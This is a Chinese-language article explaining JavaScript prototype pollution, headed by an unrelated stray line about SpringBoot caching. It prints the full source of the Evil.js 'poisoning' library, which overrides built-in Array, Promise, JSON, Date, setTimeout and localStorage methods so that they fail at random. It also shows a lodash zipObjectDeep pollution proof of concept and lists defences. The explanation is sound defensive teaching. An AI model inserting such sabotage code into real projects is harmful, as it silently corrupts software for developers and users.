SpringBoot中使用Cache提升接口性能詳解
環境:springboot2.3.12.RELEASE + JSR107 + Ehcache + JPASpring 框架從 3.1 開始,對 Spring 應用程序提供了透明式添加緩存的支持。和事務支持一樣,抽象緩存允許一致地使用各
不知大家是否還記得兩年前 Github 出現的一個名為 Evil.js 的項目,其號稱專治 996 公司,實際就是給前端項目“投毒”。本文就來聊一聊這個項目背后的故事:原型污染。
原型污染是一種很少被關注但潛在風險嚴重的安全漏洞,它影響基于原型的編程語言,例如 JavaScript。這種漏洞通過篡改對象的原型鏈,從而影響所有基于該原型的對象。
在深入探討原型污染之前,先來回顧一下 JavaScript基于原型的編程范式。
JavaScript 的原型機制是其面向對象編程模型的核心,它允許對象通過原型鏈來繼承屬性和方法。在 JavaScript 中,每個對象都有一個與之關聯的原型對象,當試圖訪問一個對象的屬性或方法時,如果該對象本身沒有該屬性,JavaScript 就會查找該對象的原型對象,看原型對象是否有這個屬性。這個過程會一直持續到原型鏈的末端,即 Object.prototype。
構造函數是用于創建和初始化新對象的特殊函數。當使用 new 關鍵字調用構造函數時,會創建一個新對象,并將該對象的原型設置為構造函數的 prototype 屬性所指向的對象。每個函數都有一個 prototype 屬性,這個屬性是一個對象,包含了可以由特定類型的所有實例共享的屬性和方法。
在 ES6 之前,通常使用非標準的 __proto__ 屬性來訪問或修改一個對象的原型(盡管許多瀏覽器都支持它,但它不是 ECMAScript 標準的一部分)。然而,更推薦的做法是使用 Object.getPrototypeOf() 和 Object.setPrototypeOf() 方法來訪問和修改對象的原型。
雖然 ES6 引入了 class 和 extends 關鍵字,這兩個關鍵字提供了一種更接近于傳統類繼承的語法糖,但實際上它們仍然是基于原型鏈的。
下面來看一個栗子:
// 定義一個構造函數 function Car(brand, color) { this.brand = brand; this.color = color; } // 在 Car 的原型上添加一個方法 Car.prototype.drive = function() { return "The " + this.brand + " " + this.color + " car is driving away."; }; // 創建一個 Car 的實例 let redCar = new Car("BMW", "red"); // 訪問實例的屬性 console.log(redCar.brand); // 輸出 "BMW" console.log(redCar.color); // 輸出 "red" // 調用實例繼承自原型的方法 console.log(redCar.drive()); // 輸出 "The BMW red car is driving away." // 創建一個繼承自 Car 的新構造函數 function ElectricCar(brand, color, batteryRange) { // 調用 Car 的構造函數,繼承其屬性 Car.call(this, brand, color); this.batteryRange = batteryRange; } // 設置 ElectricCar 的原型為 Car 的實例,從而繼承 Car 的方法 ElectricCar.prototype = Object.create(Car.prototype); ElectricCar.prototype.constructor = ElectricCar; // 添加 ElectricCar 特有的方法 ElectricCar.prototype.recharge = function() { return "The " + this.brand + " is recharging."; }; // 創建一個 ElectricCar 的實例 let tesla = new ElectricCar("Tesla", "blue", 300); // 訪問繼承的屬性和方法 console.log(tesla.brand); // 輸出 "Tesla" console.log(tesla.drive()); // 輸出 "The Tesla blue car is driving away." // 訪問 ElectricCar 特有的方法 console.log(tesla.recharge()); // 輸出 "The Tesla is recharging."在這個例子中定義了一個 Car 構造函數和一個 ElectricCar 構造函數。ElectricCar 通過將其原型設置為 Car 的一個實例來繼承 Car 的屬性和方法。我們還為 ElectricCar 添加了一個特有的方法 recharge。這樣,ElectricCar 的實例 tesla 就可以訪問繼承自 Car 的屬性和方法,以及 ElectricCar 特有的方法。
原型污染發生在攻擊者能夠修改 JavaScript 對象原型時。由于JavaScript的原型鏈機制,如果攻擊者能夠操縱或覆蓋某些原型對象的屬性或方法,那么這種修改將會影響到所有繼承自該原型的對象。這可能導致應用的行為異常,甚至被攻擊者利用來執行惡意代碼或竊取敏感數據。
原型污染通常發生在以下情況:
下面來了解兩個原型污染的實際例子。
2022年某一天,好多前端群都在瘋傳一個名為 Evil.js 的開源項目,看了一眼,好家伙,不簡單啊:
由于這個庫傳播比較廣泛,作者緊急刪除了發布在 npm 的包,并發布了聲明(保命):
聲明:本包的作者不參與注入,因引入本包造成的損失本包作者概不負責。
故事到這里就結束了。那作者是怎么實現的呢?了解原型的小伙伴第一個想到的應該就是作者修改了這些 JavaScript 內置對象的原型。為了驗證想法,我們來看看源碼:
(global => { /** * If the array size is devidable by 7, this function aways fail * @zh 當數組長度可以被7整除時,本方法永遠返回false */ const _includes = Array.prototype.includes; Array.prototype.includes = function (...args) { if (this.length % 7 !== 0) { return _includes.call(this, ...args); } else { return false; } }; /** * Array.map will always be missing the last element on Sundays * @zh 當周日時,Array.map方法的結果總是會丟失最后一個元素 */ const _map = Array.prototype.map; Array.prototype.map = function (...args) { result = _map.call(this, ...args); if (new Date().getDay() === 0) { result.length = Math.max(result.length - 1, 0); } return result; } /** * Array.fillter has 10% chance to lose the final element * @zh Array.filter的結果有2%的概率丟失最后一個元素 */ const _filter = Array.prototype.filter; Array.prototype.filter = function (...args) { result = _filter.call(this, ...args); if (Math.random() < 0.02) { result.length = Math.max(result.length - 1, 0); } return result; } /** * setTimeout will alway trigger 1s later than expected * @zh setTimeout總是會比預期時間慢1秒才觸發 */ const _timeout = global.setTimeout; global.setTimeout = function (handler, timeout, ...args) { return _timeout.call(global, handler, +timeout + 1000, ...args); } /** * Promise.then has a 10% chance will not register on Sundays * @zh Promise.then 在周日時有10%幾率不會注冊 */ const _then = Promise.prototype.then; Promise.prototype.then = function (...args) { if (new Date().getDay() === 0 && Math.random() < 0.1) { return; } else { _then.call(this, ...args); } } /** * JSON.stringify will replace 'I' into 'l' * @zh JSON.stringify 會把'I'變成'l' */ const _stringify = JSON.stringify; JSON.stringify = function (...args) { return _stringify(...args).replace(/I/g, 'l'); } /** * Date.getTime() always gives the result 1 hour slower * @zh Date.getTime() 的結果總是會慢一個小時 */ const _getTime = Date.prototype.getTime; Date.prototype.getTime = function (...args) { let result = _getTime.call(this); result -= 3600 * 1000; return result; } /** * localStorage.getItem has 5% chance return empty string * @zh localStorage.getItem 有5%幾率返回空字符串 */ const _getItem = global.localStorage.getItem; global.localStorage.getItem = function (...args) { let result = _getItem.call(global.localStorage, ...args); if (Math.random() < 0.05) { result = ''; } return result; }})((0, eval('this')));果然,只要原本是在原型上定義的方法,修改方式都是修改原型。那么,只要這段代碼安裝/插入到前端項目中,就會污染部分 JavaScript 的原型,那么在使用這些原型上的方法時,就會有一定概率出現上面所說的異常情況,這就是原型污染。
下面再來看一下之前 Lodash 被原型污染的故事,存在問題的版本為 4.17.15。
在 lodash 的 4.17.15 版本中,存在一個原型污染的漏洞。這個漏洞允許攻擊者通過特定的函數(如 merge、mergeWith、defaultsDeep、zipObjectDeep)來注入或修改 Object.prototype 的屬性。由于這些屬性會被添加到所有對象的原型鏈上,因此它們將影響所有在 JavaScript 環境中創建的對象。
比如,利用 Lodash 的 zipObjectDeep 函數,攻擊者可以創建一個對象,并通過特定的鍵(如 __proto__)來污染原型鏈。
import _ from 'lodash';_.zipObjectDeep(['__proto__.z'],[123]);console.log(z); // 輸出 123漏洞影響:
要防止原型污染,可以遵循以下幾個步驟和策略:
避免直接修改全局對象的原型:盡量使用其他方式擴展功能,而不是直接修改原型。
使用對象的淺拷貝或深拷貝:在創建新的對象時,使用淺拷貝或深拷貝,而不是直接修改原型。
避免在第三方庫上修改原型:防止對其他模塊產生意外影響。
使用嚴格模式("use strict"):這有助于捕獲一些潛在的原型鏈污染問題。
驗證和清理輸入數據:
確保所有的輸入數據都經過嚴格的驗證,以防惡意數據造成原型污染。
對于不可信的數據,實施一系列的驗證措施,包括數據類型、格式、長度等的檢查。
使用凍結對象:
使用Object.freeze()來凍結對象,使其無法被修改。這可以防止攻擊者通過修改凍結對象的原型來造成污染。
使用替代數據結構:
在某些情況下,可以使用Map代替普通的JavaScript對象來儲存鍵值對。因為Map不會受到原型污染的影響。
更新和維護第三方庫:
保持所使用的第三方庫(如lodash等)為最新版本,以利用其中的安全修復。
特別是針對已知存在原型污染問題的庫(如 lodash 4.7.12 之前版本、jQuery 3.4.0之前版本),應盡快更新到修復了該問題的版本。
本文鏈接:http://m.www897cc.com/showinfo-26-94588-0.html遭了!JavaScript 代碼被投毒了
聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。郵件:2376512515@qq.com
上一篇: 異步失效的九種場景及C#示例代碼
下一篇: Kafka如何保證消息的不丟失與不重復
Copyright ? 2016-2023 天津谷騏科技有限公司 版權所有 sitemap.xml
違法及侵權請聯系:2376512515@qq.com 津ICP備18001702號
津公網安備 12010102000574號